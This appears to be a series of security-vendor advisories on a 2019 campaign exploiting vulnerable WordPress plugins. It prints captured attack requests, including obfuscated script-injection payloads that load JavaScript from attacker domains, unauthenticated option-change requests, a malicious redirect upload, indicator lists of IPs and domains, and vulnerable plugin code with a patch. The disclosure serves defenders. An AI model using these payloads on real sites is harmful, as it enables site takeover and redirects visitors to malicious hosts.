Plugins added to Malware Campaign: October 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: October 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Blog Designer

185.238.0.214 - action=save&blog_nonce=save&custom_css=%3C%2Fstyle%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27%26%23x64%3B%26%23x61%3B%26%23x74%3B%26%23x61%3B%26colon%3B%26%23x74%3B%26%23x65%3B%26%23x78%3B%26%23x74%3B%26sol%3B...skipped...%3B%26lpar%3B%26%23x63%3B%26rpar%3B%26semi%3B%26rcub%3B%27%3E%3C%2Fscript%3E%3Cstyle%3E&updated=true] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WPeMatico RSS Feed Fetcher

159.65.65.204 - "GET /wp-admin/admin-post.php?wpematico-action=settings_tab_settings HTTP/1.1" 200 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0" 

Smart Google Code Inserter

192.169.159.241 - action=savegooglecode&home=https://track.beforwardplay.com/track/uu?t=1&&sgcgoogleanalytic=<script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var c &equals; b&period;createEle&#...skipped...arCode&lpar;104&comma;101&comma;97&comma;100&rpar;&rpar;&lsqb;0&rsqb;&period;appendChild&lpar;c&rpar;&semi;&rcub;'></script>&sgcwebtools=&siteurl=https://track.beforwardplay.com/track/uu.js?t=1& "POST /wp-admin/admin-ajax.php HTTP/1.1"

Post Custom Templates Lite

192.99.38.186 - otw_pctl_action=manage_otw_pctl_options&otw_pctl_custom_css=</textarea><script type=text/javascript src='data&colon;text&sol;javascript&comma;if&lpar;document&period;head&rpar;&lcub;&Tab;var b &equals; document&semi;var&...skipped...&lpar;c&rpar;&semi;&rcub;'></script> "POST /wp-admin/admin-post.php HTTP/1.1" 

Woody Ad Snippets

162.241.149.54 - --fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22wbcr_inp_import_files\x22; filename=\x22lc.json\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0A{\x22generator\x22:\x22x\x22,\x22date_created\x22:\x22x\x22,\x22snippets\x22:[{\x22name\x22:\x22x\x22,\x22title\x22:\x22\x22,\x22content\x22:\x22x\x22,\x22location\x22:\x22header\x22,\x22type\x22:\x22php\x22,\x22filters\x22:\x22\x22,\x22changed_filters\x22:\x220\x22,\x22scope\x22:\x22everywhere\x22,\x22description\x22:\x22<script type=text/javascript src='https://cls.balantfromsun.com/cls.js?z=1&&v=2'></script>\x22,\x22attributes\x22:\x22\x22,\x22tags\x22:[]}]}\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22swpsmtp_import_settings\x22\x0D\x0A\x0D\x0A1\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5\x0D\x0AContent-Disposition: form-data; name=\x22action\x22\x0D\x0A\x0D\x0Aswpsmtp_clear_log\x0D\x0A--fa51ba6a52e563a3b66864f78f10c9009cf9ed0c0018b2e8242f0db167a5--\x0D\x0A] "POST /wp-admin/admin-post.php HTTP/1.1"

FV Flowplayer Video Player

162.241.149.54 - action=fv_wp_flowplayer_email_signup&email=%3Csvg%2Fonload%3Deval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C49%2C55%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3E%40test.com&list=1 [08/Oct/2019:12:54:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Poll, Survey, Form & Quiz Maker

50.63.162.9 -  "GET /wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=\x22><script type=text/javascript src='https://cd.privacylocationforloc.com/track&v15'></script> HTTP/1.1"

DELUCKS SEO

167.99.232.64 - dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Battachments%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bfollow%5D=follow&dpc%5Bbasic_metadata%5D%5Bcategories%5D%5B1%5D%5Bindex%5D=index&dpc%5Bbasic_metadata%5D%5Bdpc_status_basic_metadata%5D=1&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives%5D%5Btitle%5D%5Bdelimiter%5D=-&dpc%5Bbasic_metadata%5D%5Ben%5D%5Barchives...skipped...5Bgoogle%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Bpinterest%5D=&dpc%5Bbasic_metadata%5D%5Bverify%5D%5Byandex%5D=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v9%27%3E%3C%2Fscript%3E&dpc_save_settings=1 "POST /wp-admin/admin-post.php HTTP/1.1" 

Social Metrics Tracker

50.63.162.9 - gapi_client_id=%22%3E%3Cscript+type%3Dtext%2Fjavascript+src%3D%27https%3A%2F%2Fcd.privacylocationforloc.com%2Ftrack%26v5%27%3E%3C%2Fscript%3E "POST /wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1&section=gapi HTTP/1.1"

Malicious Domains and IPs:

IPs:

159.65.65.204
192.169.243.42
167.99.232.64
50.63.162.9
192.169.159.241
185.238.0.214
192.99.38.186
159.203.175.216
80.211.164.226
162.241.149.53
186.147.2.49

Domains Injected:

  • track[.]beforwardplay[.]com
  • cls[.]balantfromsun[.]com
  • cd[.]privacylocationforloc[.]com
  • bes[.]belaterbewasthere[.]com
  • ave[.]cervantes[.]es
  • hungthinhsg[.]com[.]vn

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins added to Malware Campaign: September 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: September 2019

Plugins that are continuing to be leveraged by attackers are:

Plugin Payloads Added to the Campaign

Rich Reviews

149.202.215.42 - read-more-text=Readme+more%22%3B%3C%2Fscript%3E%3Cscript+type%3Dtext%2Fjavascript+%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C98%2C101%2C1...skipped...%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cscript%3E&update=rr-update-options [28/Sep/2019] "POST /wp-admin/admin-post.php?page=fp_admin_options_page"

Blog Designer

62.76.25.158 - action=save&custom_css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_fr2cdmdy7%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C116%2F%2A_y78qgjy8u%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_58zwawter%2A%2F%2C47%2F%2A_1scpswrsv%2A%2F%2C47%2F%2A_58zwawter%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_fr2cdmdy7%2A%2F%2C115%2F%2A_58zwawter%2A%2F%2C46%2F%2A_fr2cdmdy7%2A...skipped...B_y78qgjy8u.send%28+null+%29%3Breturn+_y78qgjy8u.responseText%3B%7Dfunction+_wwsyflqj0%28todo%29%7B+var+_avq14iyav+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_avq14iyav%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&updated=true [23/Sep/2019:05:04:38 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Coming Soon Page and Maintenance Mode

62.76.25.158 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&hook=general&logo_enable=on&logo_height=1&logo_width=1&rcsp_description=%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_vw5ansga3qp4fwa%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_w1g30wg9f776x67%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C47%2F%2A_ug3v7obje18b87n%2A%2F%2C47%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_vw5ansga3qp4fwa%2A%2F%2C115%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C46%2F%2A_vw5ansga3qp4fwa%2A%2F%2C99%2F%2A_ug3v7obje18b87n%2A%2F%2C114%2F%2A_vw5ansga3qp4fwa%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C97%2F%2A%2A%2F%2C116%2F%2A%2A%2F%2C101%2F%2A%2A%2F%2C114%2F%2A_ug3v7obje18b87n%2A%2F%2C101%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C108%2F%2A%2A%2F%2C97%2F%2A_w1g30wg9f776x67%2A%2F%2C116%2F%2A_ug3v7obje18b87n%2A%2F%2C105%2F%2A%2A%2F%2C118%2F%2A_nugjx0jhw9l3b4f%2A%2F%2C101%2F%2A_ug3v7obje18b87n%2A%2F%2C99%2F%2A_vw5ansga3qp4fwa%2A%2F%2C104%2F%2A_w1g30wg9f776x67%2A%2F%2C97%..skipped...%29%3B_pr3rd9vm0zvo3tw%280%2C0%29%3B%7D%3C%2Fscript%3E&rcsp_headline=was+here&rcsp_logo_url=https%3A%2F%2Fave.cervantes.es%2Fsites%2Fdefault%2Ffiles%2Fdemocursos_aveglobal.jpg [23/Sep/2019] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1" 

WP Quick Booking Manager

62.76.25.158 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+++type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+c+%3D+0%3Bvar+_3evx21%3DString.fromCharCode%28104%2F%2A%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C116%2F%2A_tp5mxm%2A%2F%2C112%2F%2A%2A%2F%2C115%2F%2A%2A%2F%2C58%2F%2A_h01hcw%2A%2F%2C47%2F%2A_tx1yiy%2A%2F%2C47%2F%2A_h01hcw%2A%2F%2C100%2F%2A%2A%2F%2C110%2F%2A_3evx21%2A%2F%2C115%2F%2A_h01hcw%2A%2F%2C46%2F%2A_3evx21%2A%2F%2C99%2F%2A_tx1yiy%2A%2F%2C114%2F%2A_3evx21%2A%2F%2C101%2F%2A_h01hcw%2A%2F...skipped...iy%28_0wg1jn%29%7B+var+_tp5mxm+%3D+new+XMLHttpRequest%28%29%3B_tp5mxm.open%28+String.fromCharCode%2871%2C69%2C84%29%2C+_0wg1jn%2C+false+%29%3B_tp5mxm.send%28+null+%29%3Breturn+_tp5mxm.responseText%3B%7Dfunction+_ocrrhn%28todo%29%7B+var+_fta15b+%3D+new+Function%28%27x%27%2C+%27y%27%2C+todo%2B%27+return+x%2By%3B%27%29%3B_fta15b%280%2C0%29%3B%7D%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [23/Sep/2019:05:04:30 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

WP Private Content Plus

62.76.25.158 - submit=Save%2BChanges&wppcp_general%5Bpost_page_redirect_url%5D=https%3A%2F%2Fdns.createrelativechanging.com%2Fsub%2Ftfso.js%3Fz%3D6%26&wppcp_general%5Bprivate_content_module_status%5D=1&wppcp_general%5Bprivate_mod%5D=1&wppcp_tab=wppcp_section_general [23/Sep/2019] "POST /wp-admin/admin-ajax.php?page=wppcp-settings HTTP/1.1"

woocommerce-ajax-filters

78.142.211.111 - - [18/Sep/2019] "GET /wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors HTTP/1.1" 

Malicious Domains and IPs:

149.202.215.42
62.76.25.158
132.148.27.189
185.212.128.201
213.128.89.176
167.99.232.64
207.154.198.108
159.203.86.82
192.95.14.196
162.241.175.243
104.248.237.226
104.238.72.132
46.101.174.128
51.68.204.149
188.166.188.152
104.236.178.208
162.243.13.195
45.252.249.240
158.69.194.57
139.59.116.30
78.142.211.111
192.95.14.196
51.38.38.1
91.234.217.135
82.223.69.53
51.158.72.203
162.243.165.84
175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
142.44.151.107
186.202.161.191
192.169.243.42
178.62.93.109
159.65.155.168
217.182.95.250

Domains Injected:

  • dns.createrelativechanging[.]com
  • bes.belaterbewasthere[.]com
  • gabriellalovecats[.]com
  • www.dzobainteriors[.]com
  • ns1.bullgoesdown[.]com

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Plugins Under Attack: August 2019

This is an update for the long-lasting malware campaign targeting vulnerable plugins during August and September. Please check our previous updates below:

Plugins Under Attack: August 2019

Plugins that are continuing to be leveraged by attackers for months are:

Plugin Payloads Added to the Campaign

Simple-301-redirects-addon-bulk-uploader

178.128.193.158 - --43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22301_bulk_redirects\x22; filename=\x22301_redirects.csv\x22\x0D\x0AContent-Type: application/csv\x0D\x0A\x0D\x0A/,https://developsincelock.com/54768?\x0D\x0A*,https://developsincelock.com/5868?\x0D\x0A/*,https://developsincelock.com/34234?\x0D\x0A\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22submit_bulk_301\x22\x0D\x0A\x0D\x0A1\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22auto_detect_end_line\x22\x0D\x0A\x0D\x0A0\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22wpnonce\x22\x0D\x0A\x0D\x0A887cc0cb2f\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911\x0D\x0AContent-Disposition: form-data; name=\x22_wp_http_referer\x22\x0D\x0A\x0D\x0A/wp-admin/options-general.php?page=301bulkoptions\x0D\x0A--43a8d1df3e809162dd41895414f1186f7a8ba38c778819fb80d2e3a13911--\x0D\x0A [28/Aug/2019:13:56:32 +0000] "POST /wp-admin/admin-post.php?page=301bulkoptions HTTP/1.1" 

Kiwi-Social-Share

162.243.126.96 - action=kiwi_social_share_set_option&args=%7B%27option%27%3A+%27users_can_register%27%2C+%27value%27%3A+%271%27%7D [17/Aug/2019:13:00:36 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Nd-learning

158.69.194.57 - action=nd_learning_import_settings_php_function&nd_learning_value_import_settings=siteurl%5Bnd_learning_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_learning_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_learning_value_import_settings=siteurl[nd_learning_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_learning_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_stats_import_settings_php_function&nd_stats_value_import_settings=siteurl%5Bnd_stats_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_stats_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-post.php?nd_stats_value_import_settings=siteurl[nd_stats_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_stats_end_option] HTTP/1.1" 
158.69.194.57 - action=nd_travel_import_settings_php_function&nd_travel_value_import_settings=home%5Bnd_travel_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret%3Fl%3D1%26%5Bnd_travel_end_option%5D [09/Aug/2019:03:02:54 +0000] "POST /wp-admin/admin-ajax.php?nd_travel_value_import_settings=home[nd_travel_option_value]https://jackielovedogs.com/pret?l=1&[nd_travel_end_option] HTTP/1.1" 

Responsive-coming-soon

158.69.194.57 - action_rcs=action_rcs_page_setting_save_post&home_sec_link_txt=off&logo_enable=off&rcsp_description=off&rcsp_headline=%3Cscript+async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%28116%2C114%2C101%2C114%2C53%2C55%2C56%2C52%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+Strin...skipped...%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?page=wpsm_responsive_coming_soon HTTP/1.1"

Nd-donations

158.69.194.57 - action=nd_donations_import_settings_php_function&nd_donations_value_import_settings=siteurl%5Bnd_donations_option_value%5Dhttps%3A%2F%2Fjackielovedogs.com%2Fpret.js%3Fl%3D1%26%5Bnd_donations_end_option%5D [09/Aug/2019:03:02:53 +0000] "POST /wp-admin/admin-post.php?nd_donations_value_import_settings=siteurl[nd_donations_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_donations_end_option] HTTP/1.1"

Malicious Domains and IPs:

IPs:

185.238.0.34
45.12.32.105
45.12.32.102
185.238.0.33
178.128.193.158
37.122.209.28
217.61.56.11
185.18.226.161
188.213.166.219
162.243.126.96
192.169.227.95
149.202.75.164
185.104.184.109
192.169.255.17
45.12.32.102
185.238.0.35
158.69.194.57
185.238.0.146
45.12.32.55
185.238.0.133

Domains Injected:

*   **wiilberedmodels.com[.]com**
*   **hungthinhsg[.]com[.]vn**
*   **developsincelock[.]com**
*   **bbwebsitecontent[.]com**
*   **bachatours[.]com**
*   **tomorrowwillbehotmaybe[.]com**
*   **jackielovedogs[.]com**
*   **gabriellalovecats[.]com**

We strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.

Unauthenticated settings update in woocommerce-ajax-filters

woocommerce-ajax-filters, which currently has over 10,000 installations (versions <=1.3.6) allows unauthenticated attackers to arbitrarily update all the plugin options and redirect any user to an external malicious URL when the product section is visited. The bug takes advantage of a misunderstanding of the admin_init hook’s execution context.

if( is_admin() ) {
      require_once dirname( __FILE__ ) . '/includes/wizard.php';
}
[...]

function wizard_selectors($wizard) {
[...]
 <div class="wizard_custom_js_css" style="display: none;">
    <h3><?php _e('User custom CSS style', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_custom_css]">
        <?php echo br_get_value_from_array($option, array('user_custom_css')) ?>
    </textarea>
    <h3><?php _e('JavaScript Before Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][before_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'before_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript On Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][on_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'on_update')) ?>
    </textarea>
    <h3><?php _e('JavaScript After Products Update', 'BeRocket_AJAX_domain') ?></h3>
    <textarea name="berocket_aapf_wizard_settings[user_func][after_update]">
        <?php echo br_get_value_from_array($option, array('user_func', 'after_update')) ?>
    </textarea>
</div>

[...]

What's the problem with the code above?

  • Developer assumed that WordPress’s admin_init hook are only called when an administrator user visited a page inside /wp-admin/
  • The plugin settings allow users to add custom javascript code

A patch was released a few days ago to address this vulnerability.

Because of the nature of the bug, specifically it’s severity, we will not be disclosing additional details. We are seeing malicious requests being used in the wild. While most of them target /wp-admin/admin-post.php, other endpoints in the /wp-admin/ directory can be used to trigger the admin_init hook and exploit the vulnerability.

Malicious IPs attacking this plugin:

175.126.62.37
104.238.99.130
45.32.104.33
139.99.106.10
153.126.194.159
162.241.175.243
51.68.204.149
162.243.165.84
142.44.151.107
186.202.161.191
46.105.17.29
192.169.243.42
186.202.161.191
159.65.65.204
192.30.164.48
51.158.72.203
178.62.93.109
139.59.116.30
213.128.89.176
138.68.181.84

If you have an old version of this plugin installed please update to the latest version (1.3.7) asap. You can add a WAF as a second layer of protection and virtually patch the vulnerability.

Lack of controls when using WordPress’ update_option() with...

As mentioned in recent posts, WordPress’ update_option() function is used to update any option in the options database table. If the permission flow when using this function isn’t correctly implemented by developers, attackers can gain admin access or inject arbitrary data into any site.

This is the case for the plugin Login or Logout Menu Item, which currently has over 10,000 installations (versions <= 1.1.1). This vulnerability allows unauthenticated attackers to arbitrarily update some plugin options and redirect any user to an external malicious URL.

function lolmi_save_settings() { 
if(isset($_POST['lolmi_settings_submit'])) { 

$login_page_url = (isset($_POST['lolmi_login_page_url']) && !empty($_POST['lolmi_login_page_url'])) ? $_POST['lolmi_login_page_url'] : wp_login_url(); $login_redirect_url = (isset($_POST['lolmi_login_redirect_url']) && !empty($_POST['lolmi_login_redirect_url'])) ? $_POST['lolmi_login_redirect_url'] : home_url(); $logout_redirect_url = (isset($_POST['lolmi_logout_redirect_url']) && !empty($_POST['lolmi_logout_redirect_url'])) ? $_POST['lolmi_logout_redirect_url'] : home_url(); 

update_option('lolmi_login_page_url', esc_url_raw($login_page_url)); 
update_option('lolmi_login_redirect_url', esc_url_raw($login_redirect_url));
update_option('lolmi_logout_redirect_url', esc_url_raw($logout_redirect_url)); 

[...]
} 
}

What's the problem with the function above?

  • It updates the key “_lolmi_login_pageurl” with any value provided by the user
  • Does not check for capability
  • Does not check nonce

A patch was released on August 5th, 2019 to address this vulnerability:

--Version: 1.1.1
++Version: 1.2.0
Plugin URI: https://caseproof.com

[…]
 ++ <?php wp_nonce_field('lolmi_nonce'); ?>
<input type="submit" id="lolmi_settings_submit" name="lolmi_settings_submit" value="<?php _e('Save Settings', 'lolmi'); ?>" class="button button-primary" />
</form>
[…]      
function lolmi_save_settings() {
 if(isset($_POST['lolmi_settings_submit'])) {
++if(!current_user_can('manage_options')) { die("Cheating eh?"); }
++check_admin_referer('lolmi_nonce');
[...]

With just a few lines of code in the right place, developers can avoid security issues related to the misuse of this function and keep their users safe.

These kind of bugs are always the first choice for bad actors—they don’t need any authentication on the site, it’s monetizable, and really easy to automate.

Here's how they are exploiting this particular bug in old versions of the plugin Login or Logout Menu Item:

192.169.157.142 - lolmi_settings_submit=1&lolmi_login_page_url=http[:]//gabriellalovecats[.]com/wp-login.php [0/Aug/2019] "POST /wp-admin/admin-post.php?action=lolmi_save_settings HTTP/1.1"

Plugins Under Attack: July 2019

A long-lasting malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites:

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

Plugins that are continuing to be leveraged by attackers for months are:

 

Payloads added to the campaign

 

WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

myStickymenumyStickymenu

 

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

File Manager

 

192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

Appointment Booking Calendar

 

